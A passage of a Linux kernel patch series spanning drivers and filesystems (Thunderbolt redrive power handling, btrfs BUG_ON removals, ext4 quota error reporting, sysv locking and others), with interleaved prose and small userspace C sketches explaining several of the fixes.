+-		*args->resid = scmd->resid_len;
+-	if (args->sense)
+-		memcpy(args->sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
+-	if (args->sshdr)
++	if (resid)
++		*resid = scmd->resid_len;
++	if (sense && scmd->sense_len)
++		memcpy(sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
++	if (sshdr)
+ 		scsi_normalize_sense(scmd->sense_buffer, scmd->sense_len,
+-				     args->sshdr);
+-
++				     sshdr);
+ 	ret = scmd->result;
+  out:
+ 	blk_mq_free_request(req);
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(scsi_execute_cmd);
++EXPORT_SYMBOL(__scsi_execute);
+ 
+ /*
+  * Wake up the error handler if necessary. Avoid as follows that the error
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index f32236c3f81c6..3ec9b324fdcf9 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3299,8 +3299,8 @@ static void sd_read_block_zero(struct scsi_disk *sdkp)
+ 	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
+ 	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
+ 
+-	scsi_execute_cmd(sdkp->device, cmd, REQ_OP_DRV_IN, buffer, buf_len,
+-			 SD_TIMEOUT, sdkp->max_retries, NULL);
++	scsi_execute_req(sdkp->device, cmd, DMA_FROM_DEVICE, buffer, buf_len,
++			 NULL, SD_TIMEOUT, sdkp->max_retries, NULL);
+ 	kfree(buffer);
+ }
+ 
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 9ebdd0cd0b1cf..91ab97a456fa9 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -130,6 +130,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_rooks_county,
+ 	},
++	{
++		/* quirk used for NUC15 LAPRC710 skew */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPRC710"),
++		},
++		.driver_data = (void *)intel_rooks_county,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 4104743dbc17e..202dce0d2e309 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -337,14 +337,18 @@ static int thermal_of_monitor_init(struct device_node *np, int *delay, int *pdel
+ 	int ret;
+ 
+ 	ret = of_property_read_u32(np, "polling-delay-passive", pdelay);
+-	if (ret < 0) {
+-		pr_err("%pOFn: missing polling-delay-passive property\n", np);
++	if (ret == -EINVAL) {
++		*pdelay = 0;
++	} else if (ret < 0) {
++		pr_err("%pOFn: Couldn't get polling-delay-passive: %d\n", np, ret);
+ 		return ret;
+ 	}
+ 
+ 	ret = of_property_read_u32(np, "polling-delay", delay);
+-	if (ret < 0) {
+-		pr_err("%pOFn: missing polling-delay property\n", np);
++	if (ret == -EINVAL) {
++		*delay = 0;
++	} else if (ret < 0) {
++		pr_err("%pOFn: Couldn't get polling-delay: %d\n", np, ret);
+ 		return ret;
+ 	}
+ 
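
The thermal_of fix distinguishes "property absent" (-EINVAL from of_property_read_u32(), now treated as a default of 0) from "property present but malformed" (still fatal). A minimal userspace sketch of that optional-property handling, with a stub standing in for the DT accessor (names are illustrative):

#include <errno.h>
#include <stdio.h>

/* Illustrative stub: -EINVAL means "property absent", like
 * of_property_read_u32(); other negatives mean a malformed node. */
static int read_u32_prop(const char *name, unsigned int *val)
{
	(void)name;
	(void)val;
	return -EINVAL;
}

static int monitor_init(unsigned int *delay)
{
	int ret = read_u32_prop("polling-delay", delay);

	if (ret == -EINVAL) {
		*delay = 0;	/* absent property: polling disabled */
	} else if (ret < 0) {
		fprintf(stderr, "couldn't get polling-delay: %d\n", ret);
		return ret;	/* present but broken: still fatal */
	}
	return 0;
}

int main(void)
{
	unsigned int delay;

	if (monitor_init(&delay) == 0)
		printf("polling delay: %u ms\n", delay);
	return 0;
}
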
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 4ab3803e10c83..638cb5fb22c11 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -42,6 +42,12 @@ static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_block_rpm_in_redrive(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_KEEP_POWER_IN_DP_REDRIVE;
++	tb_sw_dbg(sw, "preventing runtime PM in DP redrive mode\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -85,6 +91,14 @@ static const struct tb_quirk tb_quirks[] = {
+ 		  quirk_usb3_maximum_bandwidth },
+ 	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE, 0x0000, 0x0000,
+ 		  quirk_usb3_maximum_bandwidth },
++	/*
++	 * Block Runtime PM in DP redrive mode for Intel Barlow Ridge host
++	 * controllers.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI, 0x0000, 0x0000,
++		  quirk_block_rpm_in_redrive },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI, 0x0000, 0x0000,
++		  quirk_block_rpm_in_redrive },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index e1eb092ad1d67..e83269dc2b067 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -1050,6 +1050,49 @@ static void tb_tunnel_dp(struct tb *tb)
+ 	pm_runtime_put_autosuspend(&in->sw->dev);
+ }
+ 
++static void tb_enter_redrive(struct tb_port *port)
++{
++	struct tb_switch *sw = port->sw;
++
++	if (!(sw->quirks & QUIRK_KEEP_POWER_IN_DP_REDRIVE))
++		return;
++
++	/*
++	 * If we get hot-unplug for the DP IN port of the host router
++	 * and the DP resource is not available anymore it means there
++	 * is a monitor connected directly to the Type-C port and we are
++	 * in "redrive" mode. For this to work we cannot enter RTD3 so
++	 * we bump up the runtime PM reference count here.
++	 */
++	if (!tb_port_is_dpin(port))
++		return;
++	if (tb_route(sw))
++		return;
++	if (!tb_switch_query_dp_resource(sw, port)) {
++		port->redrive = true;
++		pm_runtime_get(&sw->dev);
++		tb_port_dbg(port, "enter redrive mode, keeping powered\n");
++	}
++}
++
++static void tb_exit_redrive(struct tb_port *port)
++{
++	struct tb_switch *sw = port->sw;
++
++	if (!(sw->quirks & QUIRK_KEEP_POWER_IN_DP_REDRIVE))
++		return;
++
++	if (!tb_port_is_dpin(port))
++		return;
++	if (tb_route(sw))
++		return;
++	if (port->redrive && tb_switch_query_dp_resource(sw, port)) {
++		port->redrive = false;
++		pm_runtime_put(&sw->dev);
++		tb_port_dbg(port, "exit redrive mode\n");
++	}
++}
++
+ static void tb_dp_resource_unavailable(struct tb *tb, struct tb_port *port)
+ {
+ 	struct tb_port *in, *out;
+@@ -1066,7 +1109,10 @@ static void tb_dp_resource_unavailable(struct tb *tb, struct tb_port *port)
+ 	}
+ 
+ 	tunnel = tb_find_tunnel(tb, TB_TUNNEL_DP, in, out);
+-	tb_deactivate_and_free_tunnel(tunnel);
++	if (tunnel)
++		tb_deactivate_and_free_tunnel(tunnel);
++	else
++		tb_enter_redrive(port);
+ 	list_del_init(&port->list);
+ 
+ 	/*
+@@ -1092,6 +1138,7 @@ static void tb_dp_resource_available(struct tb *tb, struct tb_port *port)
+ 	tb_port_dbg(port, "DP %s resource available\n",
+ 		    tb_port_is_dpin(port) ? "IN" : "OUT");
+ 	list_add_tail(&port->list, &tcm->dp_resources);
++	tb_exit_redrive(port);
+ 
+ 	/* Look for suitable DP IN <-> DP OUT pairs now */
+ 	tb_tunnel_dp(tb);
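
tb_enter_redrive()/tb_exit_redrive() above use the per-port redrive flag so the runtime-PM reference is taken and dropped exactly once even if hot-plug events repeat. A small userspace sketch of that flag-guarded reference pattern (a plain counter stands in for the runtime-PM usage count):

#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

struct port {
	bool redrive;	/* guards the reference against double counting */
	int pm_refs;	/* stand-in for the runtime-PM usage counter */
};

static void enter_redrive(struct port *p)
{
	if (!p->redrive) {
		p->redrive = true;
		p->pm_refs++;	/* pm_runtime_get() analogue */
	}
}

static void exit_redrive(struct port *p)
{
	if (p->redrive) {
		p->redrive = false;
		p->pm_refs--;	/* pm_runtime_put() analogue */
	}
}

int main(void)
{
	struct port p = { false, 0 };

	enter_redrive(&p);
	enter_redrive(&p);	/* repeated event must not bump the count */
	exit_redrive(&p);
	exit_redrive(&p);	/* nor may it drop below the baseline */
	assert(p.pm_refs == 0);
	printf("refs balanced: %d\n", p.pm_refs);
	return 0;
}
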
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f79cae48a8eab..b3fec5f8e20cd 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -27,6 +27,8 @@
+ #define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+ /* Disable CLx if not supported */
+ #define QUIRK_NO_CLX					BIT(1)
++/* Need to keep power on while USB4 port is in redrive mode */
++#define QUIRK_KEEP_POWER_IN_DP_REDRIVE			BIT(2)
+ 
+ /**
+  * struct tb_nvm - Structure holding NVM information
+@@ -254,6 +256,7 @@ struct tb_switch {
+  *		 DMA paths through this port.
+  * @max_bw: Maximum possible bandwidth through this adapter if set to
+  *	    non-zero.
++ * @redrive: For DP IN, if true the adapter is in redrive mode.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -280,6 +283,7 @@ struct tb_port {
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
+ 	unsigned int max_bw;
++	bool redrive;
+ };
+ 
+ /**
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 6b6abce6b69f4..d2daf0a72e347 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2969,6 +2969,9 @@ static int gsmld_open(struct tty_struct *tty)
+ {
+ 	struct gsm_mux *gsm;
+ 
++	if (!capable(CAP_NET_ADMIN))
++		return -EPERM;
++
+ 	if (tty->ops->write == NULL)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/usb/gadget/function/uvc_video.c b/drivers/usb/gadget/function/uvc_video.c
+index e81865978299c..be48d5ab17c7b 100644
+--- a/drivers/usb/gadget/function/uvc_video.c
++++ b/drivers/usb/gadget/function/uvc_video.c
+@@ -35,6 +35,9 @@ uvc_video_encode_header(struct uvc_video *video, struct uvc_buffer *buf,
+ 
+ 	data[1] = UVC_STREAM_EOH | video->fid;
+ 
++	if (video->queue.flags & UVC_QUEUE_DROP_INCOMPLETE)
++		data[1] |= UVC_STREAM_ERR;
++
+ 	if (video->queue.buf_used == 0 && ts.tv_sec) {
+ 		/* dwClockFrequency is 48 MHz */
+ 		u32 pts = ((u64)ts.tv_sec * USEC_PER_SEC + ts.tv_nsec / NSEC_PER_USEC) * 48;
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index b8b90eec91078..48478eb712119 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -585,6 +585,7 @@ done(struct sl811 *sl811, struct sl811h_ep *ep, u8 bank)
+ 		finish_request(sl811, ep, urb, urbstat);
+ }
+ 
++#ifdef QUIRK2
+ static inline u8 checkdone(struct sl811 *sl811)
+ {
+ 	u8	ctl;
+@@ -616,6 +617,7 @@ static inline u8 checkdone(struct sl811 *sl811)
+ #endif
+ 	return irqstat;
+ }
++#endif
+ 
+ static irqreturn_t sl811h_irq(struct usb_hcd *hcd)
+ {
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index 816945913ed0d..f649769912e53 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -875,6 +875,7 @@ MODULE_DEVICE_TABLE(i2c, tcpci_id);
+ #ifdef CONFIG_OF
+ static const struct of_device_id tcpci_of_match[] = {
+ 	{ .compatible = "nxp,ptn5110", },
++	{ .compatible = "tcpci", },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, tcpci_of_match);
+diff --git a/drivers/video/fbdev/core/fbmon.c b/drivers/video/fbdev/core/fbmon.c
+index b0e690f41025a..9ca99da3a56a0 100644
+--- a/drivers/video/fbdev/core/fbmon.c
++++ b/drivers/video/fbdev/core/fbmon.c
+@@ -1311,7 +1311,7 @@ int fb_get_mode(int flags, u32 val, struct fb_var_screeninfo *var, struct fb_inf
+ int fb_videomode_from_videomode(const struct videomode *vm,
+ 				struct fb_videomode *fbmode)
+ {
+-	unsigned int htotal, vtotal;
++	unsigned int htotal, vtotal, total;
+ 
+ 	fbmode->xres = vm->hactive;
+ 	fbmode->left_margin = vm->hback_porch;
+@@ -1344,8 +1344,9 @@ int fb_videomode_from_videomode(const struct videomode *vm,
+ 	vtotal = vm->vactive + vm->vfront_porch + vm->vback_porch +
+ 		 vm->vsync_len;
+ 	/* prevent division by zero */
+-	if (htotal && vtotal) {
+-		fbmode->refresh = vm->pixelclock / (htotal * vtotal);
++	total = htotal * vtotal;
++	if (total) {
++		fbmode->refresh = vm->pixelclock / total;
+ 	/* a mode must have htotal and vtotal != 0 or it is invalid */
+ 	} else {
+ 		fbmode->refresh = 0;
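
The fbmon fix matters because testing htotal and vtotal separately does not rule out a zero divisor: the 32-bit product htotal * vtotal can wrap to 0 even when both factors are non-zero. A runnable demonstration of why the product itself must be checked (the timing values are made up):

#include <stdio.h>

int main(void)
{
	unsigned int htotal = 0x10000, vtotal = 0x10000;
	unsigned int total = htotal * vtotal;	/* wraps to 0 in 32 bits */
	unsigned long long pixelclock = 148500000ULL;

	/* Testing the factors would pass, then divide by zero: */
	printf("htotal && vtotal -> %d, product -> %u\n",
	       htotal && vtotal, total);

	/* Test the value that is actually the divisor: */
	if (total)
		printf("refresh = %llu\n", pixelclock / total);
	else
		printf("invalid mode, refresh = 0\n");
	return 0;
}
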
+diff --git a/drivers/video/fbdev/via/accel.c b/drivers/video/fbdev/via/accel.c
+index 0a1bc7a4d7853..1e04026f08091 100644
+--- a/drivers/video/fbdev/via/accel.c
++++ b/drivers/video/fbdev/via/accel.c
+@@ -115,7 +115,7 @@ static int hw_bitblt_1(void __iomem *engine, u8 op, u32 width, u32 height,
+ 
+ 	if (op != VIA_BITBLT_FILL) {
+ 		tmp = src_mem ? 0 : src_addr;
+-		if (dst_addr & 0xE0000007) {
++		if (tmp & 0xE0000007) {
+ 			printk(KERN_WARNING "hw_bitblt_1: Unsupported source "
+ 				"address %X\n", tmp);
+ 			return -EINVAL;
+@@ -260,7 +260,7 @@ static int hw_bitblt_2(void __iomem *engine, u8 op, u32 width, u32 height,
+ 		writel(tmp, engine + 0x18);
+ 
+ 		tmp = src_mem ? 0 : src_addr;
+-		if (dst_addr & 0xE0000007) {
++		if (tmp & 0xE0000007) {
+ 			printk(KERN_WARNING "hw_bitblt_2: Unsupported source "
+ 				"address %X\n", tmp);
+ 			return -EINVAL;
+diff --git a/drivers/virtio/virtio.c b/drivers/virtio/virtio.c
+index 828ced0607423..1ef094427f299 100644
+--- a/drivers/virtio/virtio.c
++++ b/drivers/virtio/virtio.c
+@@ -489,13 +489,19 @@ EXPORT_SYMBOL_GPL(unregister_virtio_device);
+ int virtio_device_freeze(struct virtio_device *dev)
+ {
+ 	struct virtio_driver *drv = drv_to_virtio(dev->dev.driver);
++	int ret;
+ 
+ 	virtio_config_disable(dev);
+ 
+ 	dev->failed = dev->config->get_status(dev) & VIRTIO_CONFIG_S_FAILED;
+ 
+-	if (drv && drv->freeze)
+-		return drv->freeze(dev);
++	if (drv && drv->freeze) {
++		ret = drv->freeze(dev);
++		if (ret) {
++			virtio_config_enable(dev);
++			return ret;
++		}
++	}
+ 
+ 	return 0;
+ }
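
The virtio change unwinds the one step already taken (config-change notifications were disabled) when the driver's freeze callback fails, so an aborted suspend does not leave the device half-quiesced. A generic userspace sketch of that undo-on-failure shape (all names illustrative):

#include <stdio.h>

static int notifications_on = 1;

static void config_disable(void) { notifications_on = 0; }
static void config_enable(void)  { notifications_on = 1; }

/* Illustrative driver callback that can refuse to freeze. */
static int drv_freeze(void) { return -1; }

static int device_freeze(void)
{
	int ret;

	config_disable();
	ret = drv_freeze();
	if (ret) {
		config_enable();	/* undo the step already taken */
		return ret;
	}
	return 0;
}

int main(void)
{
	device_freeze();
	printf("after failed freeze, notifications_on = %d\n",
	       notifications_on);	/* 1: device left usable */
	return 0;
}
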
+diff --git a/fs/btrfs/export.c b/fs/btrfs/export.c
+index fab7eb76e53b2..58b0f04d7123f 100644
+--- a/fs/btrfs/export.c
++++ b/fs/btrfs/export.c
+@@ -161,8 +161,15 @@ struct dentry *btrfs_get_parent(struct dentry *child)
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+ 	if (ret < 0)
+ 		goto fail;
++	if (ret == 0) {
++		/*
++		 * Key with offset of -1 found, there would have to exist an
++		 * inode with such number or a root with such id.
++		 */
++		ret = -EUCLEAN;
++		goto fail;
++	}
+ 
+-	BUG_ON(ret == 0); /* Key with offset of -1 found */
+ 	if (path->slots[0] == 0) {
+ 		ret = -ENOENT;
+ 		goto fail;
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 9f7ffd9ef6fd7..754a9fb0165fa 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1015,7 +1015,15 @@ static int iterate_inode_ref(struct btrfs_root *root, struct btrfs_path *path,
+ 					ret = PTR_ERR(start);
+ 					goto out;
+ 				}
+-				BUG_ON(start < p->buf);
++				if (unlikely(start < p->buf)) {
++					btrfs_err(root->fs_info,
++			"send: path ref buffer underflow for key (%llu %u %llu)",
++						  found_key->objectid,
++						  found_key->type,
++						  found_key->offset);
++					ret = -EINVAL;
++					goto out;
++				}
+ 			}
+ 			p->start = start;
+ 		} else {
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 03cfb425ea4ea..ab5d410d560e7 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -3381,7 +3381,17 @@ static int btrfs_relocate_sys_chunks(struct btrfs_fs_info *fs_info)
+ 			mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 			goto error;
+ 		}
+-		BUG_ON(ret == 0); /* Corruption */
++		if (ret == 0) {
++			/*
++			 * On the first search we would find chunk tree with
++			 * offset -1, which is not possible. On subsequent
++			 * loops this would find an existing item on an invalid
++			 * offset (one less than the previous one, wrong
++			 * alignment and size).
++			 */
++			ret = -EUCLEAN;
++			goto error;
++		}
+ 
+ 		ret = btrfs_previous_item(chunk_root, path, key.objectid,
+ 					  key.type);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index bc0ca45a5d817..a843f964332c2 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -2905,7 +2905,10 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 	for (i = 0; i <= 13; i++)
+ 		seq_printf(seq, " %-5u", i <= blocksize_bits + 1 ?
+ 				sg.info.bb_counters[i] : 0);
+-	seq_puts(seq, " ]\n");
++	seq_puts(seq, " ]");
++	if (EXT4_MB_GRP_BBITMAP_CORRUPT(&sg.info))
++		seq_puts(seq, " Block bitmap corrupted!");
++	seq_puts(seq, "\n");
+ 
+ 	return 0;
+ }
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 601e097e17207..274542d869d0c 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6751,6 +6751,10 @@ static int ext4_write_dquot(struct dquot *dquot)
+ 	if (IS_ERR(handle))
+ 		return PTR_ERR(handle);
+ 	ret = dquot_commit(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			       "Failed to commit dquot type %d",
++			       dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+@@ -6767,6 +6771,10 @@ static int ext4_acquire_dquot(struct dquot *dquot)
+ 	if (IS_ERR(handle))
+ 		return PTR_ERR(handle);
+ 	ret = dquot_acquire(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			      "Failed to acquire dquot type %d",
++			      dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+@@ -6786,6 +6794,10 @@ static int ext4_release_dquot(struct dquot *dquot)
+ 		return PTR_ERR(handle);
+ 	}
+ 	ret = dquot_release(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			       "Failed to release dquot type %d",
++			       dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+diff --git a/fs/isofs/inode.c b/fs/isofs/inode.c
+index df9d70588b600..8a6c7fdc1d5fc 100644
+--- a/fs/isofs/inode.c
++++ b/fs/isofs/inode.c
+@@ -908,8 +908,22 @@ static int isofs_fill_super(struct super_block *s, void *data, int silent)
+ 	 * we then decide whether to use the Joliet descriptor.
+ 	 */
+ 	inode = isofs_iget(s, sbi->s_firstdatazone, 0);
+-	if (IS_ERR(inode))
+-		goto out_no_root;
++
++	/*
++	 * Fix for broken CDs with a corrupt root inode but a correct Joliet
++	 * root directory.
++	 */
++	if (IS_ERR(inode)) {
++		if (joliet_level && sbi->s_firstdatazone != first_data_zone) {
++			printk(KERN_NOTICE
++			       "ISOFS: root inode is unusable. "
++			       "Disabling Rock Ridge and switching to Joliet.");
++			sbi->s_rock = 0;
++			inode = NULL;
++		} else {
++			goto out_no_root;
++		}
++	}
+ 
+ 	/*
+ 	 * Fix for broken CDs with Rock Ridge and empty ISO root directory but
+diff --git a/fs/orangefs/super.c b/fs/orangefs/super.c
+index 5254256a224d7..4ca8ed410c3cf 100644
+--- a/fs/orangefs/super.c
++++ b/fs/orangefs/super.c
+@@ -527,7 +527,7 @@ struct dentry *orangefs_mount(struct file_system_type *fst,
+ 	sb->s_fs_info = kzalloc(sizeof(struct orangefs_sb_info_s), GFP_KERNEL);
+ 	if (!ORANGEFS_SB(sb)) {
+ 		d = ERR_PTR(-ENOMEM);
+-		goto free_sb_and_op;
++		goto free_op;
+ 	}
+ 
+ 	ret = orangefs_fill_sb(sb,
+diff --git a/fs/pstore/zone.c b/fs/pstore/zone.c
+index 2770746bb7aa1..abca117725c81 100644
+--- a/fs/pstore/zone.c
++++ b/fs/pstore/zone.c
+@@ -973,6 +973,8 @@ static ssize_t psz_kmsg_read(struct pstore_zone *zone,
+ 		char *buf = kasprintf(GFP_KERNEL, "%s: Total %d times\n",
+ 				      kmsg_dump_reason_str(record->reason),
+ 				      record->count);
++		if (!buf)
++			return -ENOMEM;
+ 		hlen = strlen(buf);
+ 		record->buf = krealloc(buf, hlen + size, GFP_KERNEL);
+ 		if (!record->buf) {
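
The pstore fix bails out before strlen() can dereference a NULL from a failed kasprintf(). The same shape in userspace, using asprintf(3) as the analogue (glibc extension, hence _GNU_SOURCE):

#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static ssize_t build_header(const char *reason, int count, char **out)
{
	char *buf;

	if (asprintf(&buf, "%s: Total %d times\n", reason, count) < 0)
		return -ENOMEM;	/* never strlen() a failed allocation */
	*out = buf;
	return (ssize_t)strlen(buf);
}

int main(void)
{
	char *hdr;
	ssize_t len = build_header("Oops", 3, &hdr);

	if (len < 0)
		return 1;
	fputs(hdr, stdout);
	free(hdr);
	return 0;
}
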
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index 9925cfe571595..17c7d76770a0a 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
+@@ -82,9 +82,6 @@ static inline sysv_zone_t *block_end(struct buffer_head *bh)
+ 	return (sysv_zone_t*)((char*)bh->b_data + bh->b_size);
+ }
+ 
+-/*
+- * Requires read_lock(&pointers_lock) or write_lock(&pointers_lock)
+- */
+ static Indirect *get_branch(struct inode *inode,
+ 			    int depth,
+ 			    int offsets[],
+@@ -104,15 +101,18 @@ static Indirect *get_branch(struct inode *inode,
+ 		bh = sb_bread(sb, block);
+ 		if (!bh)
+ 			goto failure;
++		read_lock(&pointers_lock);
+ 		if (!verify_chain(chain, p))
+ 			goto changed;
+ 		add_chain(++p, bh, (sysv_zone_t*)bh->b_data + *++offsets);
++		read_unlock(&pointers_lock);
+ 		if (!p->key)
+ 			goto no_block;
+ 	}
+ 	return NULL;
+ 
+ changed:
++	read_unlock(&pointers_lock);
+ 	brelse(bh);
+ 	*err = -EAGAIN;
+ 	goto no_block;
+@@ -218,9 +218,7 @@ static int get_block(struct inode *inode, sector_t iblock, struct buffer_head *b
+ 		goto out;
+ 
+ reread:
+-	read_lock(&pointers_lock);
+ 	partial = get_branch(inode, depth, offsets, chain, &err);
+-	read_unlock(&pointers_lock);
+ 
+ 	/* Simplest case - block found, no allocation needed */
+ 	if (!partial) {
+@@ -290,9 +288,9 @@ static Indirect *find_shared(struct inode *inode,
+ 	*top = 0;
+ 	for (k = depth; k > 1 && !offsets[k-1]; k--)
+ 		;
++	partial = get_branch(inode, k, offsets, chain, &err);
+ 
+ 	write_lock(&pointers_lock);
+-	partial = get_branch(inode, k, offsets, chain, &err);
+ 	if (!partial)
+ 		partial = chain + k-1;
+ 	/*
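
The sysv reordering moves the blocking read (sb_bread()) out from under pointers_lock and takes the lock only around the chain verification, since sleeping I/O must not happen inside a spinning rwlock. A pthreads sketch of that narrowed critical section (build with -lpthread; names and the generation counter are illustrative):

#include <errno.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

static pthread_rwlock_t pointers_lock = PTHREAD_RWLOCK_INITIALIZER;
static int chain_generation;	/* bumped by truncate-side writers */

static void slow_read_block(void)	/* stands in for sb_bread() */
{
	usleep(1000);	/* sleeping I/O: must not hold the lock */
}

static int get_branch_step(int expected_gen)
{
	int ok;

	slow_read_block();	/* 1: blocking read, lock not held */

	pthread_rwlock_rdlock(&pointers_lock);	/* 2: short critical section */
	ok = (chain_generation == expected_gen);	/* verify_chain() analogue */
	pthread_rwlock_unlock(&pointers_lock);

	return ok ? 0 : -EAGAIN;	/* chain changed under us: retry */
}

int main(void)
{
	printf("step: %d\n", get_branch_step(chain_generation));
	return 0;
}
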
+diff --git a/include/linux/randomize_kstack.h b/include/linux/randomize_kstack.h
+index 5d868505a94e4..6d92b68efbf6c 100644
+--- a/include/linux/randomize_kstack.h
++++ b/include/linux/randomize_kstack.h
+@@ -80,7 +80,7 @@ DECLARE_PER_CPU(u32, kstack_offset);
+ 	if (static_branch_maybe(CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT,	\
+ 				&randomize_kstack_offset)) {		\
+ 		u32 offset = raw_cpu_read(kstack_offset);		\
+-		offset ^= (rand);					\
++		offset = ror32(offset, 5) ^ (rand);			\
+ 		raw_cpu_write(kstack_offset, offset);			\
+ 	}								\
+ } while (0)
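
The randomize_kstack change matters because a plain XOR accumulator lets correlated per-syscall random bits cancel each other out; rotating before mixing spreads every contribution across all 32 bits. A runnable sketch of the two mixers side by side (ror32() reimplemented here for userspace):

#include <stdint.h>
#include <stdio.h>

static uint32_t ror32(uint32_t word, unsigned int shift)
{
	return (word >> (shift & 31)) | (word << ((32 - shift) & 31));
}

int main(void)
{
	uint32_t plain = 0, rotated = 0;
	uint32_t rnd = 0x2a;	/* pretend the timer gives this twice in a row */

	/* offset ^= rnd twice cancels out completely: */
	plain ^= rnd;
	plain ^= rnd;

	/* offset = ror32(offset, 5) ^ rnd does not: */
	rotated = ror32(rotated, 5) ^ rnd;
	rotated = ror32(rotated, 5) ^ rnd;

	printf("plain xor: %#x, rotate-xor: %#x\n", plain, rotated);
	return 0;
}
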
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 319698087d66a..6858cae98da9e 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -205,9 +205,9 @@ void rcu_tasks_trace_qs_blkd(struct task_struct *t);
+ 	do {									\
+ 		int ___rttq_nesting = READ_ONCE((t)->trc_reader_nesting);	\
+ 										\
+-		if (likely(!READ_ONCE((t)->trc_reader_special.b.need_qs)) &&	\
++		if (unlikely(READ_ONCE((t)->trc_reader_special.b.need_qs) == TRC_NEED_QS) &&	\
+ 		    likely(!___rttq_nesting)) {					\
+-			rcu_trc_cmpxchg_need_qs((t), 0,	TRC_NEED_QS_CHECKED);	\
++			rcu_trc_cmpxchg_need_qs((t), TRC_NEED_QS, TRC_NEED_QS_CHECKED);	\
+ 		} else if (___rttq_nesting && ___rttq_nesting != INT_MIN &&	\
+ 			   !READ_ONCE((t)->trc_reader_special.b.blocked)) {	\
+ 			rcu_tasks_trace_qs_blkd(t);				\
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index c4a8520dc748f..d5f888fe0e331 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2603,6 +2603,8 @@ static inline void skb_put_u8(struct sk_buff *skb, u8 val)
